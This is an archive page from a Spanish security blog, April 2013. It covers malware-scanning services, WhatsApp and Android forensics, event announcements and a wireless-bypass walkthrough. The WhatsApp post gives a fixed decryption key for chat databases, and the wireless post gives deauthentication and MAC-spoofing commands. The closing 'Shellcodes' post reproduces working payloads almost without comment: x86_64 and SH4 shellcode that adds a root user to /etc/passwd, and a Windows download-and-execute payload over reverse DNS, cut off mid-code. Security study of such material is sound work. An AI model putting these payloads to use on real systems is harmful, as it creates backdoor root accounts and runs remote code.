30 abr 2013

AndroTotal el Virus Total para el escaneo de APK’s

Ya hace tiempo que el malware tomó como objetivo el atacar el sistema Android. Es por eso que están saliendo muchos proyectos para el análisis de malware en estos entornos.

De los distintos servicios que he ido viendo éste es uno de los que más me ha gustado, por el diseño y la presentación de resultados entre otras cosas.

andro_protada

Para empezar a hacer un análisis de un sample, pulsaremos en “Start your scan now”, nos pedirá una cuenta para hacer los análisis.

scan_normal

Este es un escaneo normal, indicamos el APK a escanear, si es malware o no. Introducimos el bonito capchta y el sistema analizará nuestro APK.

AndroTotal nos permite realizar un escaneo mas avanzado donde podremos elegir incluso versión de Android.

andro_scan

Como veis podemos elegir el antivirus, también podemos elegir la versión de Android.

Una vez acabado el escáner nos mostrará información del APK.

detail_ascan

Parece Virus Total eh, a mi el diseño me ha gustado mucho, presenta la información muy clara al usuario.

andro_scan_2

En el caso de que el APK hubiera tenido distintos resultados en el apartado de antivirus aquí mostraría el gráfico. En este caso como el APK es malware y además detectado por todos los motores, todo el gráfico es rojo.

29 abr 2013

Herramientas forense para ser un buen CSI. Parte XXII: Forense en WhatsApp I de II

Buenas a todos, en el post de hoy volveremos con nuestra cadena de Herramientas Forense para ser un buen CSI, para estudiar el noble arte del estudio forense de WhatsApp. Para los artículos yo me he centrado en Android, pero el caso es portable a otras plataformas.

La aplicación WhatsApp hace uso de tres archivos muy importantes, en los que almacena toda la información sobre nuestras conversaciones y contactos:

  • wa.db, es el fichero donde se almacenan los contactos
  • msgstore.db.crypt, el fichero donde se almacenan las conversaciones actuales “cifradas”.
  • msgstore-AAAA-MM-DD.X.db.crypt, fichero con las conversaciones no recientes “cifradas”

Los dos primeros ficheros, wa.db y mgstore.db.crypt, son almacenados en la ruta "/data/data/com.whatsapp/databases", y como os imaginaréis, para acceder a ellos vamos a necesitar ser root. Para rootear el terminal os invito a visitar el siguiente artículo de esta misma cadena de posts: http://www.flu-project.com/herramientas-forense-para-ser-un-buen-csi-parte-xx-clonacion-en-android-ii-de-iii.html. El tercero de los ficheros, es un backup que se almacena  comunmente en la ruta "/sdcard/WhatsApp/databases/", y a la que podréis acceder sin necesidad de terner permisos especiales.

Vamos a suponer que ya tenéis rooteado el terminal, y vamos a traernos los ficheros wa.db y mgstore.db.crypt. Para ello, haremos uso del comando Adb pull, que aprendimos en pasados posts de esta cadena:

 Si no queremos realizar la búsqueda y recolección de estos ficheros manualmente, hay una utilidad llamada Pyadb que puede seros muy útil. Se encuentra desarrollada en python. Esta herramienta permite localizar los ficheros msgstore.db y wa.db del teléfono automáticamente.Pyadb requiere tener instalado el SDK de Android y el teléfono rooteado. La podéis descargar gratuitamente desde https://github.com/sch3m4/pyadb
Bien, una vez que tengáis los ficheros en vuestro poder, nos encontraremos con el siguiente escollo, la base de datos de conversaciones se encuentra cifrada. Esta base de datos hace uso del algoritmo de cifrado AES. Pero..., siempre utiliza la misma clave para cifrar la BBDD: 346a23652a46392b4d73257c67317e352e3372482177652c, por lo que haciendo uso de alguna utilidad como OpenSSL, no tendréis problemas para descifrarla:
Una vez descifrada podremos utilizar algunas herramientas para acceder a la información de una manera cómoda y rápida, pero eso lo veremos en el próximo artículo :)
Saludos!

28 abr 2013

Informe Flu - 121

Una semana más os traemos el resumen de la semana en Flu Project:Lunes 23 de AbrilMartes 24 de AbrilMiércoles 25 de AbrilJueves 26 de Abril

Viernes 27 de Abril

  • El jueves lanzamos al mundo las Jornadas X1RedMasSegura, que celebraremos los próximos 17 y 18 de Mayo en Madrid y que están acompañadas de una serie de Talleres Gratuitos sobre Seguridad que impartiremos entre el lunes 13 de Mayo y el jueves 16. ¡No os las perdáis!
Sábado 28 de Abril

27 abr 2013

URLQUERY, SERVICIO WEB PARA EL ANÁLISIS DE MALWARE

A día de hoy es complicado saber si no quedaremos infectados al navegar por Internet. Para infectarnos no hace falta que vayamos ha navegar en aquella página que nos puede venir en un correo de SPAM, si no que ahora una de las prácticas habituales de los ciber-criminales es infectar páginas legítimas.

Y esto, ¿porque ocurre?

Bueno es mas fácil poder llegar a infectar a usuarios que vistan webs legítimas que no intentar obligar al usuario a visitar un link que le llegará por correo ¿No?

Para tratar de analizar estas páginas webs existen páginas que nos facilitarán en poco tiempo un reporte de si hay algo peligroso en dicha página web. Uno de esos servicios es URLQuery.

Si vamos hacia la página web encontraremos los análisis que ha ido realizando la gente:

Nos da bastante información como la fecha, si en el IDS saltó una alerta o no, además de la IP e URL/IP.

Vamos a ver primero un ejemplo de una página de dominio .cat de aquí de Cataluña! Veremos un ejemplo de un report de un escaneo.

Podremos ver un resumen del escaneo, en el resumen vemos

  • URL
  • ASN
  • Localización
  • Fecha del report
  • Status
  • Alertas

Además podremos ver un pantallazo de la página web.

En Settings veremos con que parámetros se ha configurado el escaneo. En este caso podemos ver que versiones específicas han saltado.

También podemos ver la parte de alertas que ha saltado en los motores.

Que mas cosas podemos ver en el reporte de URLQuery

Si URLQuery ha encontrado mas alertas en el mismo DOMINIO/IP/ASN nos lo mostrará, para poder ver relación entre infecciones por ejemplo.

Otra de las cosas interesantes es poder ver los Javascripts que se ejecutan en la página para ver si hay alguno malicioso, por ejemplo.

También podremos ver las transacciones HTTP que hay en la web.

En la última parte del report podemos ver los REQUEST que hace la página y los response recibidos.Vamos a ver en un ejemplo de infección en la web, que indicadores deberíamos de tener en cuenta.

Una de las alertas en las que nos tenemos que fijar en URLQuery es en los Javascript que carga la página, aquí podremos ver funciones EVAL, por ejemplo.

Esta es una de las cosas que podremos tener en cuenta.

Otra de las cosas que podremos ver es las peticiones que se realizan desde la página al cargarla:

URLQuery además nos marcará la petición en amarillo para que la revisemos.

URLQuery es gratis y permite analizar las URL’s que necesites, por otro lado además tienen el apartado de estadísticas en el que podrás consultar que Exploits Packs son los que mas han analizado. También cuando realices un análisis puedes cambiar la versión de Java y Adobe además del navegador.

26 abr 2013

Jornadas X1RedMasSegura

Buenas a todos, hoy tenemos el placer de comunicaros el lanzamiento de unas Jornadas de Seguridad de la Información orientadas a enseñar los problemas de seguridad principales que existen en la Red a público de perfil no técnico, X1RedMasSegura.

El evento se encuentra coordinado por un grupo de bloggers y colaboradores voluntarios, que han ofrecido sus ganas y todo su apoyo por hacer de estas jornadas algo GRANDE, sin ningún ánimo de lucro. Tenemos la inmensa suerte de formar parte de la organización del evento y sobretodo y lo más importante de habernos podido rodear de GRANDES amigos para sacarlo adelante. A todos ellos aprovechamos desde aquí para transmitirles nuestro agradecimiento y en especial, a la persona que encendió la mecha para que todo esto fuese posible.

También queremos agradecer a los patrocinadores, que de manera totalmente altruista nos han ofrecido locales, auditorios y demás material para la realización de las jornadas, GRACIAS.

Las Jornadas durarán una semana, del 13 al 18 de Mayo. Comenzarán por una serie de talleres GRATUITOS que se celebrarán del lunes 13 al jueves 16 de Mayo en la sede de IPA Madrid,, para Ciberabuelos, Padres e Internautas Base, en los que se enseñarán como protegerse de la red de redes sin necesidad de ser experto ni en Informática, ni en Seguridad de la Información. Entre los temas que se tratarán se encuentran porqué es necesario utilizar HTTPS, cómo crear una contraseña segura, seguridad en redes sociales, etc. Los talleres tienen un máximo de 40 plazas cada uno, y podréis apuntaros GRATUITAMENTE desde aquí.

Los talleres son de nivel básico en Informática y Seguridad de la Información, por lo que si tenéis conocimientos técnicos os rogamos que NO os apuntéis y cedáis vuestra plaza a otras personas que la necesiten mucho más.

Los días 17 y 18 de Mayo se celebrá el evento principal en la sede de everis Madrid. Las jornadas comenzarán el viernes 17 a las 16:00 horas y finalizarán el sábado a las 14:30 horas. Al igual que los talleres, las jornadas van dirigidas a público no técnico y en ellas se tratarán problemas actuales como las estafas cibernéticas, malware (virus), acoso y abuso en Internet, etc., explicado para ser entendido por todos los niveles.

Podéis ver la agenda de las jornadas desde aquí.

Entre los ponentes de las jornadas se encuentran profesionales de la categoría de Román Ramírez, Presidente del Congreso RootedCon, Ángel Bahamontes, Presidente de la Asociación Nacional de Tasadores y Peritos Judiciales Informáticos, Juan Luis García Rambla, Director de Seguridad TIC en Sidertia, Juan Garrido, Consultor de Seguridad y blogger de WindowsTips, Chema Alonso, Consultor de Seguridad y blogger de Un Informático en el Lado del Mal, Carlos Represa, Responsable del Centro Nacional de Seguridad Escolar, Lorenzo Martínez, Director de Securizame y blogger en SecurityByDefault, Josep Albors, Responsable de Medios de ESET España, Israel Córdoba, Fundador de Aiuken, Pablo González y Juan Antonio Calles, Fundadores de Flu Project y Blanca Tulleuda.

Para registraros en las Jornadas debéis rellenar el siguiente formulario (es un formulario de registro distinto al de los talleres):

Acceso al Formulario de Registro para las Jornadas X1RedMasSegura

A continución os dejamos la dirección para llegar tanto a los talleres como al lugar donde se celebrarán las jornadas:

TALLERES

  • Los talleres se realizarán en la sede de IPA Madrid, situada en los bajos de la antigua Unidad de Retiro, detrás de la Junta Municipal, Av. Ciudad de Barcelona, nº 164 (posterior), Madrid. Se accede por la entrada con el cartel de Museo de Policía Municipal. Transportes públicos para llegar:
    • Metro: Estación Pacífico (Salida a la Calle de Sánchez Barcáiztegui), correspondiente a las líneas 1 y 6 de metro.

JORNADAS X1REDMASSEGURA

  • Sede de everis. Avenida de Manoteras, 52, 28050, Madrid. Transportes públicos para llegar:
    • Metro: Tren ligero ML1 Las Tablas - Pinar de Chamartán (la estación más próxima es Virgen del Cortijo)
    • Renfe: Estación Fuente de la Mora (Línea C10 y C7)
    • Autobuses: 150 (Puerta del Sol - Colonia Virgen del Cortijo) y 174 (Plaza Castilla - San Chinarro Este)

El viernes por la tarde, cuando salgamos del evento, nos iremos algunos miembros de la organización a tomar algo y disfrutar de la Final de la Copa del Rey de Futbol a un bar de la zona, por si alguien se anima a unirse a la fiesta ;)

Esperamos que las jornadas sean un éxito, las disfrutéis y sobretodo que sirvan para lo que queremos, conseguir entre todos 1RedMasSegura.

Saludos! #X1RedMasSegura!

25 abr 2013

Curso Perito Informático Forense en Tarragona

Buenas a todos, los próximos 10 y 11 de Mayo de 2013 se celebra en la Universidad Rovira i Virgili, en Reus (Tarragona) una formación de Peritaje Informático Forense.
 
El curso está organizado por Pedro Sánchez, lo cual es una gran garantía de éxito. El objetivo de esta formación es enseñar a los asistentes las diversas actividades que se llevan a cabo a lo largo de un análisis forense, de manera que pueda ser un buen punto de apoyo a la hora de ser perito informático judicial.
 
Entre el plantel de ponentes que Pedro ha seleccionado se encuentran grandes profesionales y amigos como  Lorenzo Martínez, David Barroso, Simón Roses, Juan Garrido "Silverhack", Marc Rivero, Pedro Sánchez o Eloy Velasco y un servidor, Juan Antonio Calles.En los siguientes enlaces, podéis ver la lista completa de ponentes y la agenda inicial de las presentaciones, que a continuación os resumimos:
 
 
El curso tiene un coste de 70 euros para socios de la ANTPJI y Universitarios, así como de 140 euros para profesionales. Podéis llevar a cabo la inscripción al evento aquí.Nos vemos en Reus :)
Saludos!

24 abr 2013

Reto Forense: Guy! Where is the info?

Una banda de narcos ha despachado por Móstoles y trabajado a sus anchas hasta que un grupo especial de la Policía les ha interceptado en una operación. En dicha operación se incautaron ciertos dispositivos electrónicos, de los que se han realizado diversas copias. A ti como analista forense te llega una copia de la Policía, los cuales confían en tus habilidades con los 0s y los 1s, para extraer el máximo de información del dispositivo.



La policía sospecha que los detenidos estaban esperando algún tipo de intercambio con otras bandas organizadas, pero no conocen más datos. Han distribuido las copias de los dispositivos electrónicos para obtener algo de información que pueda ayudarles. La policía dispone de cierta información sobre localizaciones que los narcos utilizarían para realizar reuniones, o incluso almacenar armas.

¿Qué información puedes aportar a la policía?

Para pasar el reto:
  • Obtén el máximo de información de la imagen del pendrive.
  • Realiza un informe explicando lo que has ido averiguando e hilando tu línea temporal.
ACTUALIZACIÓN: El reto ha finalizado, ¡Gracias a los que habéis participado! Podéis acceder a la solución en el siguiente enlace:

23 abr 2013

Herramientas forense para ser un buen CSI. Parte XXI: Clonación en Android III de III

Buenas a todos, hoy finalizaremos el proceso de adquisición de evidencias en Android, para ello, la semana pasada aprendimos a rootear el terminal para poder acceder con permisos de adminitración y ejecutar comandos especiales, como por ejemplo "DD".

Antes de clonar las particiones de un sistema Android, deberemos conocerlas. Para listarlas podremos entrar con la instrucción "adb shell" al móvil, como aprendimos la semana pasada, y ejecutar la instrucción "ls /dev/mtd". Os aparecerán distintas particiones que comienzan por mtd (siglas de Memory Technology Device, se trata de un subsistema Linux utilizado en medios flash como en móviles), es similar a los puntos de montaje hd* de los discos IDE o sd* de los SCSI o SATA. Junto con cada una de las particiones nos encontraremos con otra similar que termina por las letras ro (read only).

Ahora bien, ¿cómo sabremos que partición se corresponde con qué identificador?, para ello debemos acceder al fichero /proc/mtd, donde se encuentra la correspondencia de particiones:

Ahora que ya sabemos a que partición corresponde cada identificador, si quisiesemos clonar bit a bit la partición "boot" simplemente deberíamos hacer un dd, poniendo como origen "/dev/mtd/mtd2" y como destino la sdcard (importante que tenga espacio suficiente):

Una vez realizada la clonación podremos traernos la imagen de la tarjeta SD a través del comando "adb pull ORIGEN DESTINO":

Una vez que tengamos la imagen en el equipo podremos abrirla con alguna herramienta como Autopsy o una de mis preferidas, FTK Imager:

Bien eso es todo por hoy, seguiremos en próximos artículos de la cadena hablando de Forense.

Saludos! :)

22 abr 2013

Configuraciones básicas de "Seguridad" en redes Wireless (Parte II de II)

Hoy en esta segunda parte se estudiará una prueba de concepto para evadir las configuraciones explicadas anteriormente. Se puede decir que hoy toca bypassear todo lo posible.

En esta prueba de concepto se presenta el siguiente escenario:
  • Un punto de acceso que tiene configurado el acceso solo para clientes con ciertas direcciones MAC
  • Un punto de acceso con DHCP deshabilitado.
  • El SSID de la red oculto.
  • Un cliente asociado a la red.
  • El atacante dispone de la contraseña de la red wireless o ésta se encuentra abierta, es decir, sin cifrado en el tráfico de paquetes por el medio de transmisión. Es decir algo fácil.

Una vez se coloca el adaptador wireless en modo monitor se puede escuchar todo lo que circula por el aire, por lo que mediante el uso de la herramienta airodump-ng se puede visualizar el estado aéreo alrededor del equipo. En la imagen se visualiza como existe una red con SSID oculto, de longitud 4, la cual tiene asociado un equipo cliente. Gracias a éste se podrá obtener el nombre de la red real, para ello se ejecuta el ataque de desautenticación de aireplay-ng -0 5 –a <dirección MAC AP> -c <dirección MAC cliente> mon0.

Tras realizar dicha acción el cliente volverá autenticarse con el punto de acceso y se obtendrá el paquete con el nombre de la red. En el caso de no haber un cliente asociado a la red se puede recurrir a la fuerza bruta con la aplicación mdk3.

Ahora toca conseguir un fichero CAP con el tráfico que circula por el punto de acceso y de esta manera poder visualizar rangos de direcciones IP para evadir o bypassear el servidor DHCP deshabilitado. se puede visualizar como el cliente asociado al punto de acceso ha estado realizado peticiones multicast a ciertos servicios, e incluso puede haber navegado a través de Internet, cuya acción se vería en texto plano si el protocolo así estuviera construido.

Ahora con la aplicación macchanger se puede cambiar la dirección física del adaptador wireless para que cuando se conecte se bypasee el filtrado MAC, esto se denomina Mac Spoofing. 

Tras esto se ha realizado un bypass a las 3 configuraciones básicas de "seguridad wireless".

21 abr 2013

Informe Flu - 120

Una semana más os traemos el resumen de la semana en Flu Project:Lunes 15 de AbrilMartes 16 de AbrilMiércoles 17 de AbrilJueves 18 de Abril

Viernes 19 de Abril

Sábado 20 de Abril
  • Ayer publicamos una nueva edición de Pantalla Pública, con nuestra edición número 23 ;)

20 abr 2013

Pantalla Pública XXIII

Buenas a todos, una semana más volvemos con nuestra cadena Pantalla Pública, con nuevos cazados que nos enviais a nuestro email info@flu-project.com.La primera de las pantallas nos la envía nuestro amigo Lorenzo Martínez de Security by default, y en ella sale la lucha de Álvaro Andrade con un cajero, ¡gracias a ambos!, os dejamos con su mensaje:
Hola,os adjunto una fotillo de un cajero en Bolivia (el aeropuerto de Santa Cruz de la Sierra) una vez que se tragó la tarjeta de mi amigo Álvaro Andrade (@aandradex). Lo he visto en su facebook y me parece que os cuadra estupendamente :)Saludos,

 Continuando con pantallas públicas curiosas, os dejamos con 2 cazados en máquinas expendedoras de Coca Cola y Pepsi. Ninguna se libra de nuestra querida amiga, la pantalla azul :) Saludos!

19 abr 2013

Spoon, Browser Sandbox

Los sistemas llamados sandbox cada vez se hacen mas populares en el sector de la seguridad.

Una sandbox es un entorno aislado en el que podremos ejecutar aplicaciones sin que la máquina de cliente se infecte. Las sandbox se usan en los análisis de malware para ver que cambios realiza una muestra de malware en el sistema.

Hoy no vengo ha hablar de malware y sandbox pero si que hay relación.

Leís los feeds y me encontraba con una utilidad que ha salido para probar la compatibilidad de aplicaciones webs. Se llama Spoon.

Esta aplicación permite lanzar un navegador para probar una aplicación.

browsers

Si lo piensas detenidamente para un desarrollador puede ir muy bien, ya que permitirá probar la aplicación que desarrolle en distintas plataformas.

Al seleccionar un browser nos permitirá escoger cualquier versión.

diferentes_versiones

Si pensamos en modo negativo podríamos llegar a pensar en un desarrollador de un Kit de explotación que necesita probar su muestra. En vez de tardar mucho en probarla en todos los browsers teniendo muchos ordenadores o máquinas virtuales tenemos un servicio como Spoon para probar la aplicación.

Los planes de precios que hay en la web no son para nada exagerados teniendo en cuenta la de dinero que pueden ganar con la muestra de malware.

precios

Además de poder comprar la licencia, si al malo le preocupa por ejemplo el tener que pasar por la infraestructura de Spoon es posible el poder montar un servidor de aplicaciones.

server

Y espero que hayan  protegido esos entornos Spoon ya que me imagino a mas de uno intentando lo siguiente:

metasploit

Interesante esto de Spoon, sin duda

18 abr 2013

Shellcodes (Parte III de III)

Último artículo de Shellcodes, disfrutarlo! :D

http://www.exploit-db.com/exploits/18585/

Linux x86_64 - add user with passwd (189 bytes);sc_adduser01.S;Arch:          x86_64, Linux;;Author:        0_o -- null_null;           nu11.nu11 [at] yahoo.com;Date:          2012-03-05;;compile an executable: nasm -f elf64 sc_adduser.S;           ld -o sc_adduser sc_adduser.o;compile an object: nasm -o sc_adduser_obj sc_adduser.S;;Purpose:       adds user "t0r" with password "Winner" to /etc/passwd;executed syscalls:     setreuid, setregid, open, write, close, exit;Result:        t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash;syscall op codes:  /usr/include/x86_64-linux-gnu/asm/unistd_64.hBITS 64[SECTION .text]global _start_start:;sys_setreuid(uint ruid, uint euid)xor     rax,    raxmov     al,     113                     ;syscall sys_setreuidxor     rbx,    rbx                     ;arg 1 -- set real uid to rootmov     rcx,    rbx                     ;arg 2 -- set effective uid to rootsyscall;sys_setregid(uint rgid, uint egid)xor     rax,    raxmov     al,     114                     ;syscall sys_setregidxor     rbx,    rbx                     ;arg 1 -- set real uid to rootmov     rcx,    rbx                     ;arg 2 -- set effective uid to rootsyscall;push all strings on the stack prior to file operations.xor rbx,    rbxmov     ebx,    0x647773FFshr     rbx,    8push    rbx                             ;string \00dwsmov     rbx,    0x7361702f6374652fpush    rbx                             ;string sap/cte/mov     rbx,    0x0A687361622F6EFFshr     rbx,    8push    rbx                             ;string \00\nhsab/nmov     rbx,    0x69622F3A746F6F72push    rbx                             ;string ib/:toormov     rbx,    0x2F3A3A303A303A67push    rbx                             ;string /::0:0:gmov rbx,    0x46556B554B587435push    rbx             ;string FUkUKXt5mov rbx,    0x546755333A723074push    rbx             ;string TgU3:r0t;prelude to doing anything useful...mov rbx,    rsp         ;save stack pointer for later usepush    rbp             ;store base pointer to stack so it can be restored latermov rbp,    rsp         ;set base pointer to current stack pointer;sys_open(char* fname, int flags, int mode)sub rsp,        16mov [rbp - 16], rbx     ;store pointer to "t0r..../bash"mov si,     0x0401      ;arg 2 -- flagsmov rdi,        rbxadd rdi,        40      ;arg 1 -- pointer to "/etc/passwd"xor rax,        raxmov al,     2       ;syscall sys_opensyscall;sys_write(uint fd, char* buf, uint size)mov [rbp - 4],  eax     ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.mov rcx,        rbx     ;arg 2 -- load rcx with pointer to string "t0r.../bash"xor rdx,        rdxmov dl,     39      ;arg 3 -- load rdx with size of string "t0r.../bash\00"mov rsi,        rcx     ;arg 2 -- move to source index registermov rdi,        rax     ;arg 1 -- move to destination index registerxor     rax,            raxmov     al,             1               ;syscall sys_writesyscall;sys_close(uint fd)xor rdi,        rdimov edi,        [rbp - 4]   ;arg 1 -- load stored file descriptor to destination index registerxor rax,        raxmov al,     3       ;syscall sys_closesyscall;sys_exit(int err_code)xor rax,    raxmov al, 60          ;syscall sys_exitxor rbx,    rbx         ;arg 1 -- error codesyscall;char shellcode[] =;   "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31";   "\xc0\xb0\x72\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31\xdb\xbb";   "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63";   "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a";   "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69";   "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35";   "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33";   "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10";   "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28";   "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31";   "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f";   "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48";   "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";;;equivalent code:;;char shellcode[] =;   "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31";   "\xc0\xb0\x72\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31\xdb\xbb";   "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63";   "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a";   "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69";   "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35";   "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33";   "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10";   "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28";   "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31";   "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f";   "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48";   "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";-------------------------------------------------------------------------------------http://www.exploit-db.com/exploits/17439/SuperH (sh4) Add root user with password/*** Title:     Linux/SuperH - sh4 - add root user with password - 143 bytes** Date:      2011-06-23** Tested on: debian-sh4 2.6.32-5-sh7751r** Author:    Jonathan Salwan - twitter: @jonathansalwan**** http://shell-storm.org**** Informations:** -------------**               - user: shell-storm**               - pswd: toor**               - uid : 0**** open:**         mov      #5, r3**         mova     @(130, pc), r0**         mov      r0, r4**         mov      #255, r13**         mov      #4, r12**         mul.l    r13, r12**         sts      macl, r5**         add      #69, r5**         mov      #84, r13**         mov      #5, r12**         mul.l    r13, r12**         sts      macl, r6**         trapa    #2**         mov      r0, r11**** write:**         xor      r6, r6**         xor      r5, r5**         mov      #4, r3**         mov      r11, r4**         mova     @(20, pc), r0**         mov      r0, r5**         mov      #72, r6**         trapa    #2**** close:**         mov      #6, r3**         mov      r11, r4**         trapa    #2**** exit:**         mov      #1, r3**         xor      r4, r4**         trapa    #2**        ** user:**         .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n"**** file:**         .string "@@@/etc/passwd"****** The '@@@' is just for alignment.***/#include #include char *SC =           /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */           "\x05\xe3\x20\xc7\x03\x64\xff\xed"           "\x04\xec\xd7\x0c\x1a\x05\x45\x75"           "\x54\xed\x05\xec\xd7\x0c\x1a\x06"           "\x02\xc3"           /* r11 = fd */           "\x03\x6b"           /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */           "\x6a\x26\x5a\x25\x04\xe3\xb3\x64"           "\x04\xc7\x03\x65\x48\xe6\x02\xc3"           /* close(fd) */           "\x06\xe3\xb3\x64\x02\xc3"           /* exit(0) */           "\x01\xe3\x4a\x24\x02\xc3"           /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */           "\x73\x68\x65\x6c\x6c\x2d\x73\x74"           "\x6f\x72\x6d\x3a\x24\x31\x24\x4b"           "\x51\x59\x6c\x2f\x79\x72\x75\x24"           "\x50\x4d\x74\x30\x32\x7a\x55\x54"           "\x57\x6d\x4d\x76\x50\x57\x63\x55"           "\x34\x6f\x51\x4c\x73\x2f\x3a\x30"           "\x3a\x30\x3a\x72\x6f\x6f\x74\x3a"           "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62"           "\x69\x6e\x2f\x62\x61\x73\x68\x5c"           "\x6e"           /* @@@/etc/passwd */           "\x40\x40\x40\x2f\x65\x74\x63\x2f"           "\x70\x61\x73\x73\x77\x64";int main(void){   fprintf(stdout,"Length: %d\n",strlen(SC));   (*(void(*)()) SC)();return 0;}
-----------------------------------------------------------------------------------------------------------------------------http://www.exploit-db.com/exploits/17326/DNS Reverse Download and Exec Shellcode
##
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
#       [DSecRG]
#     a.sintsov [sobachka] dsecrg.com
#     dookie [sobachka] inbox.ru
#
# P.S. Works with  Vista/7/2008
#       do not work in XP/2003 because thre are no IPv6 by default.
#       can work in XP/2003 if IPv6 installed
#       (it is not need to be enabled, just installed)
require 'msf/core'
module Metasploit3
    include Msf::Payload::Windows
    include Msf::Payload::Single
    def initialize(info = {})
        super(update_info(info,
            'Name'          => 'DNS_DOWNLOAD_EXEC',
            'Version'       => '0.01',
            'Description'   => 'Download and Exec (via DNS)',
            'Author'        => [ 'Alexey Sintsov' ],
            'License'       => MSF_LICENSE,
            'Platform'      => 'win',
            'Arch'          => ARCH_X86,
            'Payload'       =>
                {
                    'Offsets' =>{ },
                    'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74
                                \x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78
                                \x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33
                                 \x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73
                                 \x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
                    'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF
                                   \x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e
                                   \x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B
                                   \x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F
                                   \x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46
                                   \x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4
                                    \xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54
                                    \x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24
                                    \x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50
